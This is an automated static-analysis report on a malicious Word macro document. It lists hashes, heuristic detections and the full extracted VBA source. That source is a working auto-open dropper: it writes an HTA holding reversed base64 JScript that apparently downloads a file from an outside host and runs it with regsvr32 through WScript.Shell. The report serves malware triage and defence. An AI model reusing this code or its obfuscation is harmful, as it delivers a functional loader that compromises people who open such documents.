Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e9c49b3da7e23f8e…

MALICIOUS

Office (OOXML)

80.3 KB Created: 2021-04-01 06:50:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: a0f5fc923ed81dd4767cdf2941c8dcc4 SHA-1: 7f73ce2658b3dd71618192f00c7ca6330a1246e4 SHA-256: e9c49b3da7e23f8e720665aab1ef9f8b8d90dd109cb889b2b93daad1b9b9f047
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set tmpLib = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set tmpLib = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9564 bytes
SHA-256: be3849f3e53bb79620d3ffeef4c017a649a8ddce4f99a57a6c7d25e832ed9656
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{B34A6DF9-68A1-442E-8719-17E1F82882A8}{C4F05115-DBB1-4811-9CB7-673BC7D618E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function refRequestTextbox()
With frm.button1
refRequestTextbox = .Tag
End With
End Function
Function globalOptionTable()
With frm.button1
globalOptionTable = .Caption
End With
End Function
Public Sub button1_Click()
Set tmpLib = CreateObject("wscript.shell")
tmpLib.exec p(refRequestTextbox) & " " & p(globalOptionTable)
End Sub


Attribute VB_Name = "classWMem"
Sub autoopen()
queryMainTmp
End Sub
Function intel(ExTitle)
intel = "" & ExTitle & ""
End Function
Sub queryMainTmp()
Dim selectSwap As String
selectSwap = p(frm.button1.Caption)
Set exceptionListboxList = New borderMemory
exceptionListboxList.tempResponseBuffer selectSwap, nextMemoryVariable
frm.button1_Click
End Sub
Function tempValue(rightResponseArgument, refArray, storageATrust)
tempValue = Replace(rightResponseArgument, refArray, storageATrust)
End Function

Attribute VB_Name = "exceptionLenMem"
Function removeNextTemp()
removeNextTemp = intel("<html><body><div id='content'>fTtlc29sYy50bnVvQ2Vzbm9wc2VScnRwOy")
End Function
Function listBufferRepo()
listBufferRepo = intel("kyICwiZ3BqLm5pYU10Y3VydFNwbXRcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3")
End Function
Function trustLink()
trustLink = intel("RldmFzLnRudW9DZXNub3BzZVJydHA7KXlkb2Jlc25vcHNlci5yYVZ0eGVUdHhldC")
End Function
Function titleValue()
titleValue = intel("hldGlydy50bnVvQ2Vzbm9wc2VScnRwOzEgPSBlcHl0LnRudW9DZXNub3BzZVJydH")
End Function
Function optionSwapDocument()
optionSwapDocument = intel("A7bmVwby50bnVvQ2Vzbm9wc2VScnRwOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZX")
End Function
Function captionViewLink()
captionViewLink = intel("ZpdGNBIHdlbiA9IHRudW9DZXNub3BzZVJydHAgcmF2eykwMDIgPT0gc3V0YXRzLn")
End Function
Function buttonException()
buttonException = intel("JhVnR4ZVR0eGV0KGZpOykoZG5lcy5yYVZ0eGVUdHhldDspZXNsYWYgLCJIVU1lan")
End Function
Function copyNextOption()
copyNextOption = intel("NRNDZFPWRpYyZWOXRPYVdQTk5HazVJV0RXa0k9OXd6TDBLdnFoJnVmamc5SVlGM1")
End Function
Function structCountLoad()
structCountLoad = intel("Y9ZGlzJkg2REhoVE1ndXdlR3o9ZGkma3JHZzI0Z2R0OWdGVjdKTGJTZDl2UD1kaS")
End Function
Function ExPaste()
ExPaste = intel("ZTTFowcnFlZnBjb0hjOD03SEtFTyZ4eD1lbWl0PzduYXgvOXc4TENiRWtRSEczS0")
End Function
Function textListException()
textListException = intel("FVZUhTc0RENjB5V2hHTXlZYnpRY0RJSnRIdkQvMzYyMjcvNjUyNDgvRHp1RTFXa0")
End Function
Function funcValueCaption()
funcValueCaption = intel("piVm4vcmFLcFVLdnllRDd6TlNLZ3hZM1VQWmNpQnFRR2drN1NJZkg4bGJLZjVHVX")
End Function
Function listWindowEx()
listWindowEx = intel("ZrTGxHLzUyODk2L3N5dW9nL21vYy4xMjAyLWduaWNydW9zdHVvLWV2b20vLzpwdH")
End Function
Function counterList()
counterList = intel("RoIiAsIlRFRyIobmVwby5yYVZ0eGVUdHhldDspInB0dGhsbXguMmxteHNtIih0Y2")
End Function
Function rightText()
rightText = intel("VqYk9YZXZpdGNBIHdlbiA9IHJhVnR4ZVR0eGV0IHJhdg==|fXspcmVmZnVCeXJld")
End Function
Function buttonVariableReference()
buttonVariableReference = intel("XEoaGN0YWN9OykiYXRoLm5pYU10Y3VydFNwbXRcXGNpbGJ1cFxcc3Jlc3VcXDpjI")
End Function
Function namespaceRepo()
namespaceRepo = intel("ihlbGlmZXRlbGVkLnhlZG5JcnRwe3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pd")
End Function
Function tempConstClear()
tempConstClear = intel("HBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHhlZG5JcnRwIHJhdjspImdwai5ua")
End Function
Function tempBufferDelete()
tempBufferDelete = intel("WFNdGN1cnRTcG10XFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIobnVyLikib")
End Function
Function refTextbox()
refTextbox = intel("GxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id='table1")
End Function
Function constDatabaseArray()
constDatabaseArray = intel("'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/<")
End Function
Function titleDataRequest()
titleDataRequest = intel("/div><div id='table3'></div><script language='javascript'>functi")
End Function
Function responseButtonTitle()
responseButtonTitle = intel("on genericTrustMain(responseSize){return(new ActiveXObject(respo")
End Function
Function bufferMainCopy()
bufferMainCopy = intel("nseSize));}function clearRight(genericProc){return(pointerLenWin")
End Function
Function captionW()
captionW = intel("dow.getElementById(genericProc).innerHTML);}function memoryLink(")
End Function
Function loadLinkRepo()
loadLinkRepo = intel("){var ExQuery = clearRight('table1');var globalDataBorder = ExQu")
End Function
Function repoReferenceButton()
repoReferenceButton = intel("ery.toLowerCase();var requestDeleteSize = clearRight('table2');r")
End Function
Function constArgument()
constArgument = intel("eturn(ExQuery + globalDataBorder + requestDeleteSize);}function ")
End Function
Function localVariableW()
localVariableW = intel("structPtrProcedure(s){var e={}; var i; var b=0; var c; var x; va")
End Function
Function queryListboxCounter()
queryListboxCounter = intel("r l=0; var a; var referenceRequest=''; var w=String.fromCharCode")
End Function
Function sizeValue()
sizeValue = intel("; var L=s.length;var titlePointer = 'charAt';for(i=0;i<64;i++){e")
End Function
Function indexText()
indexText = intel("[memoryLink()[titlePointer](i)]=i;}for(x=0;x<L;x++){c=e[s[titleP")
End Function
Function libEx()
libEx = intel("ointer](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||")
End Function
Function clearStruct()
clearStruct = intel("(x<(L-2)))&&(referenceRequest+=w(a));}}return(referenceRequest);")
End Function
Function deleteMemoryA()
deleteMemoryA = intel("};function counterRequest(requestList){return requestList.split(")
End Function
Function windowPointerCopy()
windowPointerCopy = intel("'').reverse().join('');}databaseLeftProc = window;pointerLenWind")
End Function
Function sizeList()
sizeList = intel("ow = document;databaseLeftProc.resizeTo(1, 1);databaseLeftProc.m")
End Function
Function leftStructTmp()
leftStructTmp = intel("oveTo(-100, -100);var vbReferenceFunc = pointerLenWindow.getElem")
End Function
Function rightLoad()
rightLoad = intel("entById('content').innerHTML;var vbReferenceFunc = vbReferenceFu")
End Function
Function ptrRefA()
ptrRefA = intel("nc.split('|');var localIndexScreen = counterRequest(structPtrPro")
End Function
Function funcMemory()
funcMemory = intel("cedure(vbReferenceFunc[0]));var pointerQuery = counterRequest(st")
End Function
Function dataWTrust()
dataWTrust = intel("ructPtrProcedure(vbReferenceFunc[1]));</script><script language=")
End Function
Function pointerListCount()
pointerListCount = intel("'javascript'>function valueTrust(textNext){var loadSelectArgumen")
End Function
Function procVariable()
procVariable = intel("t = genericTrustMain('msscriptcontrol.scriptcontrol');loadSelect")
End Function
Function constStorageGlobal()
constStorageGlobal = intel("Argument.Language = 'jscript';loadSelectArgument.Timeout = 60000")
End Function
Function varRemoveGlobal()
varRemoveGlobal = intel(";loadSelectArgument.AddCode(textNext);return(null);}</script><sc")
End Function
Function genericArrayResponse()
genericArrayResponse = intel("ript language='vbscript'>valueTrust localIndexScreen : valueTrus")
End Function
Function memoryArgument()
memoryArgument = intel("t pointerQuery : databaseLeftProc.close</script></body></html>")
End Function
Function nextMemoryVariable()
nextMemoryVariable = removeNextTemp + listBufferRepo + trustLink + titleValue + optionSwapDocument + captionViewLink + buttonException + copyNextOption + structCountLoad + ExPaste + textListException + funcValueCaption + listWindowEx + counterList + rightText + buttonVariableReference + namespaceRepo + tempConstClear + tempBufferDelete + refTextbox + constDatabaseArray + titleDataRequest + responseButtonTitle + bufferMainCopy + captionW + loadLinkRepo + repoReferenceButton + constArgument + localVariableW + queryListboxCounter + sizeValue + indexText + libEx + clearStruct + deleteMemoryA + windowPointerCopy + sizeList + leftStructTmp + rightLoad + ptrRefA + funcMemory + dataWTrust + pointerListCount + procVariable + constStorageGlobal + varRemoveGlobal + genericArrayResponse + memoryArgument
End Function

Attribute VB_Name = "borderMemory"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub tempResponseBuffer(libTitleResponse As String, loadExResponse As String)
Dim memoryResponse As FileSystemObject
Set memoryResponse = New FileSystemObject
Dim databaseCountRepo As TextStream
Set databaseCountRepo = memoryResponse.CreateTextFile(libTitleResponse)
databaseCountRepo.WriteLine loadExResponse
databaseCountRepo.Close
Set databaseCountRepo = Nothing
Set memoryResponse = Nothing
End Sub

Attribute VB_Name = "arrayLocalReference"
Function p(dataSelectBuf)
p = tempValue(dataSelectBuf, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40448 bytes
SHA-256: 189a0e79f02ba1da1b17342070f5d798bd3ce1e90672d75aace4b02cc1370185

Open this report in the interactive analyzer, or submit your own file for analysis.